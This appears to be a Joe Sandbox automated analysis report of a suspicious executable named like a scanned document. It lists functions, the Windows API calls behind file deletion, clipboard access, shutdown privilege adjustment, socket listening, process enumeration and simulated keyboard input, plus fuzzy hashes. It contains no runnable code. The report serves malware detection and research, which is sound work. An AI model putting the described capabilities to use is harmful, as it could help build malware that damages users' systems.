Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 02424f832d2ea5e739f452a789d861a90500819fd43231abc464ee0ce0fbc055
Instruction ID: 9bd259eb8d3483169038e16cfc408bb5c9460502cf9d5699998f62ff1459170f
Opcode Fuzzy Hash: 02424f832d2ea5e739f452a789d861a90500819fd43231abc464ee0ce0fbc055
Instruction Fuzzy Hash: C06169725043059FDB10EF68C8849AEB3E9FF89314F44892EF999C7251EB31E945CB92

Function 0087D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00813AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00813A97,?,?,00812E7F,?,?,?,00000000), ref: 00813AC2

Part of subcall function 0087E199: GetFileAttributesW.KERNEL32(?,0087CF95), ref: 0087E19A

FindFirstFileW.KERNEL32(?,?), ref: 0087D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0087D1DD
MoveFileW.KERNEL32(?,?), ref: 0087D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0087D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0087D237

Part of subcall function 0087D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0087D21C,?,?), ref: 0087D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0087D253
FindClose.KERNEL32(00000000), ref: 0087D264

Strings

\*.*, xrefs: 0087D0CD, 0087D0D6, 0087D0EB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: d943f30c43b86fa956aa12fca07554c57a3b2277b6b72808074f5fafa2428d8a
Instruction ID: f9880ab141660cc5a7733c83ab855e5758e04019233b317e66a701f521562e6b
Opcode Fuzzy Hash: d943f30c43b86fa956aa12fca07554c57a3b2277b6b72808074f5fafa2428d8a
Instruction Fuzzy Hash: D7617E3180120D9ACF05EBE4D9529EDB7B9FF15300F248165E44AF7196EB31AF4ACB62

Function 0088ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0088ED91
EmptyClipboard.USER32 ref: 0088ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0088EDAC
CloseClipboard.USER32 ref: 0088EEA3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6afddd7c7075babbe31b5cbc6f32a2cdfa88d4217213d86a0fa81f974bba9bef
Instruction ID: c4769590371508fabd6540fcd51cdcc31d9222d27240fd0e199f47267cdcc307
Opcode Fuzzy Hash: 6afddd7c7075babbe31b5cbc6f32a2cdfa88d4217213d86a0fa81f974bba9bef
Instruction Fuzzy Hash: 16418D35208611AFE720EF19D888B59BBE5FF55318F14C09DE419CBAA2CB75EC42CB91

Function 0087E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 008716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087170D
Part of subcall function 008716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087173A
Part of subcall function 008716C3: GetLastError.KERNEL32 ref: 0087174A

ExitWindowsEx.USER32(?,00000000), ref: 0087E932

Strings

, xrefs: 0087E95C
, xrefs: 0087E920
@, xrefs: 0087E925
SeShutdownPrivilege, xrefs: 0087E902

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 7b513760314a0fb0039a20554f8adc4fc582eb44f8b45c22ccbff6819fe44eb1
Instruction ID: ed33613e9fe8b1d7641eaaf207c1f2b2daa2998334ea485910f841f1d088ddc5
Opcode Fuzzy Hash: 7b513760314a0fb0039a20554f8adc4fc582eb44f8b45c22ccbff6819fe44eb1
Instruction Fuzzy Hash: 92014933610214AFFB6466B89C8AFBF769CF719744F148462FE1BE31D5D6A0DC408290

Function 00891204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00891276
WSAGetLastError.WSOCK32 ref: 00891283
bind.WSOCK32(00000000,?,00000010), ref: 008912BA
WSAGetLastError.WSOCK32 ref: 008912C5
closesocket.WSOCK32(00000000), ref: 008912F4
listen.WSOCK32(00000000,00000005), ref: 00891303
WSAGetLastError.WSOCK32 ref: 0089130D
closesocket.WSOCK32(00000000), ref: 0089133C

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 70e39943a1120b97cb07078d6d3d50993a70432b3c8a748ac07b8d39e546fbdf
Instruction ID: 7c4c5c9326b48492d8c47b1bbcdd4b147839af500790e0f5eda8c3aac92c5c08
Opcode Fuzzy Hash: 70e39943a1120b97cb07078d6d3d50993a70432b3c8a748ac07b8d39e546fbdf
Instruction Fuzzy Hash: 62416E316041019FEB10EF68C488B69BBE6FF46318F188198E856DF296C775ED81CBA1

Function 0084B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0084B9D4
_free.LIBCMT ref: 0084B9F8
_free.LIBCMT ref: 0084BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008B3700), ref: 0084BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,008E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0084BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,008E1270,000000FF,?,0000003F,00000000,?), ref: 0084BC36
_free.LIBCMT ref: 0084BD4B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 40a38ee8f6d7a55357793d99281e7e6599b9e852517b6fe9c076b5698861247b
Instruction ID: e012613f99d11bcb8e35dfcd96409cc75711302868efc520d45d63d06523ed38
Opcode Fuzzy Hash: 40a38ee8f6d7a55357793d99281e7e6599b9e852517b6fe9c076b5698861247b
Instruction Fuzzy Hash: 55C12571A0425DAFDB20DF698C81BAEBBB9FF41360F1441AAE590DB251EB30CE41C791

Function 0087D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00813AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00813A97,?,?,00812E7F,?,?,?,00000000), ref: 00813AC2

Part of subcall function 0087E199: GetFileAttributesW.KERNEL32(?,0087CF95), ref: 0087E19A

FindFirstFileW.KERNEL32(?,?), ref: 0087D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0087D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0087D481
FindClose.KERNEL32(00000000), ref: 0087D498
FindClose.KERNEL32(00000000), ref: 0087D4A1

Strings

\*.*, xrefs: 0087D3F2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 0711038c0b3a31c1690a251aaa880e159aa4645712857d420cde6ce09f97c7d2
Instruction ID: 5fbcaa0f860aee7ad12e3d7cec2409ef96ea4cc83973e0b340ad352761a3718e
Opcode Fuzzy Hash: 0711038c0b3a31c1690a251aaa880e159aa4645712857d420cde6ce09f97c7d2
Instruction Fuzzy Hash: 13316F710083459BC204EF68D8559EFB7ACFE92314F448A2DF4E5D2191EB20EA49D767

Function 0084E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0084E645

Strings

1#INF, xrefs: 0084F852
1#SNAN, xrefs: 0084F844
1#QNAN, xrefs: 0084F84B
1#IND, xrefs: 0084F83D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: ef0ef7d62c2f6b6ab658af321834053647aad31f405d5ae8be2bcd182bb32946
Instruction ID: 90275f9f6f5757bdbecf5443cf373a04b143d6c6901470a5804ff7d31f321b81
Opcode Fuzzy Hash: ef0ef7d62c2f6b6ab658af321834053647aad31f405d5ae8be2bcd182bb32946
Instruction Fuzzy Hash: CDC22872E0462C8FDB25CE289D407EAB7B5FB88305F1541EAD94DE7241E778AE818F41

Function 0088648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008864DC
CoInitialize.OLE32(00000000), ref: 00886639
CoCreateInstance.OLE32(008AFCF8,00000000,00000001,008AFB68,?), ref: 00886650
CoUninitialize.OLE32 ref: 008868D4

Strings

.lnk, xrefs: 008864BA, 00886524, 008865E0

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 42439b68cd21de467ab33d30ac1b53e599a59e24f4e6b7abf35d8d58bcc68c2d
Instruction ID: 3622fa213303c409e7b35e917ac7eb2557190a82d691d3d4a28ee2f28f676cb7
Opcode Fuzzy Hash: 42439b68cd21de467ab33d30ac1b53e599a59e24f4e6b7abf35d8d58bcc68c2d
Instruction Fuzzy Hash: 3AD139715083019FD304EF28C891AABB7E9FF99704F10496DF595CB291EB70E946CB92

Function 008922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 008922E8

Part of subcall function 0088E4EC: GetWindowRect.USER32(?,?), ref: 0088E504

GetDesktopWindow.USER32 ref: 00892312
GetWindowRect.USER32(00000000), ref: 00892319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00892355
GetCursorPos.USER32(?), ref: 00892381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008923DF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 3dc77ebf6d51a9f89fdea5b2214a86963387fe7439ee58600a8ec578b88dce82
Instruction ID: 915fcaadd45099f62c482e08fac491cd9e0f5a7f26ce41c3a69a42d30a1d1078
Opcode Fuzzy Hash: 3dc77ebf6d51a9f89fdea5b2214a86963387fe7439ee58600a8ec578b88dce82
Instruction Fuzzy Hash: 6331E072504315AFDB20EF58C849B5BBBA9FF89314F04091DF989D7291DB34EA08CB92

Function 00889B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00889B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00889C8B

Part of subcall function 00883874: GetInputState.USER32 ref: 008838CB
Part of subcall function 00883874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00883966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00889BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00889C75

Strings

*.*, xrefs: 00889B5D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 6b85d6c3901ab316bdafa41c23849cfb16ca4d78b361805afb8c9807275c5d0f
Instruction ID: 269e4de35f460f0a87444b13994afe44448478b9613ac4ae010d66618f43f646
Opcode Fuzzy Hash: 6b85d6c3901ab316bdafa41c23849cfb16ca4d78b361805afb8c9807275c5d0f
Instruction Fuzzy Hash: A341827190020AAFDF15EFA8C845AEE7BB9FF45310F144156E855E2291EB31AE84CF61

Function 0082997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00829BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00829BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00829A4E
GetSysColor.USER32(0000000F), ref: 00829B23
SetBkColor.GDI32(?,00000000), ref: 00829B36

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 71918c04e86930b879b2dd05fbe4d7a575905b780092bff031dec608c10d27aa
Instruction ID: a81398d775928f81ac40f502fd09bb19fbe4c064f8d9963ffe30b5e33fe9d730
Opcode Fuzzy Hash: 71918c04e86930b879b2dd05fbe4d7a575905b780092bff031dec608c10d27aa
Instruction Fuzzy Hash: 05A12D70108578AEE724AA3CAC9CE7B3A9DFF43318F164119F583D69D1CA259D81D3B2

Function 00891806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0089304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0089307A
Part of subcall function 0089304E: _wcslen.LIBCMT ref: 0089309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0089185D
WSAGetLastError.WSOCK32 ref: 00891884
bind.WSOCK32(00000000,?,00000010), ref: 008918DB
WSAGetLastError.WSOCK32 ref: 008918E6
closesocket.WSOCK32(00000000), ref: 00891915

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: f30bb6cfc0179df843ad0386fede923eab226ede30629318ad47b0aca15e5a06
Instruction ID: 5877d5369995596257fc4caa8b3cffc95542356e7760dae39aba2230e68c09aa
Opcode Fuzzy Hash: f30bb6cfc0179df843ad0386fede923eab226ede30629318ad47b0aca15e5a06
Instruction Fuzzy Hash: 70519671A002105FEB10AF28D88AF6A77E5FF45718F088058F955AF3D3DB71AD818B92

Function 008A1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 008A1CC0
IsWindowEnabled.USER32 ref: 008A1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 008A1CDB
IsIconic.USER32 ref: 008A1CE9
IsZoomed.USER32 ref: 008A1CF7

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: e0ddde5982e175b01c31130dc27ed41b7884818cbe680aa16bd236ab9b8ab957
Instruction ID: 4eb90dddcd8b453d1d5717e66cdff3021b6b0b672833f54202957d932f8a96cc
Opcode Fuzzy Hash: e0ddde5982e175b01c31130dc27ed41b7884818cbe680aa16bd236ab9b8ab957
Instruction Fuzzy Hash: C02191317406119FFB208F2AC848B6A7BE5FF96324F198058E846CBA51DB71EC42CB95

Function 00818060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00855DF0
ERCP, xrefs: 0081813C
VUUU, xrefs: 008183FA
VUUU, xrefs: 0081843C
VUUU, xrefs: 008183E8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 1a235cdec599ea831806ade56c68dcfc8ad3bb9819cefae649d12799d7f074b4
Instruction ID: f6ed3510bce12d766c6cdd333771aeedf7427cf30019443d3fedab949d82875c
Opcode Fuzzy Hash: 1a235cdec599ea831806ade56c68dcfc8ad3bb9819cefae649d12799d7f074b4
Instruction Fuzzy Hash: 6DA25770A0061ACBDF248F58C8957EEB7B6FF54315F6481AAEC15E7280EB309DD58B90

Function 0089A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0089A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0089A6BA

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

Process32NextW.KERNEL32(00000000,?), ref: 0089A79C
CloseHandle.KERNEL32(00000000), ref: 0089A7AB

Part of subcall function 0082CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00853303,?), ref: 0082CE8A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: fdddf21d8820b777b499dcb2980a8c8488e84bb9c0035e924d0de215fba06cc7
Instruction ID: 0f08d981f3fe2be853bd64791ea702b4db2d24db2ba27e6c9137a4145dd5b283
Opcode Fuzzy Hash: fdddf21d8820b777b499dcb2980a8c8488e84bb9c0035e924d0de215fba06cc7
Instruction Fuzzy Hash: 0B515B71508310AFD714EF28D886AABBBE8FF89754F00492DF595D7252EB30D944CB92

Function 0087AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0087AAAC
SetKeyboardState.USER32(00000080), ref: 0087AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0087AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0087AB88

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

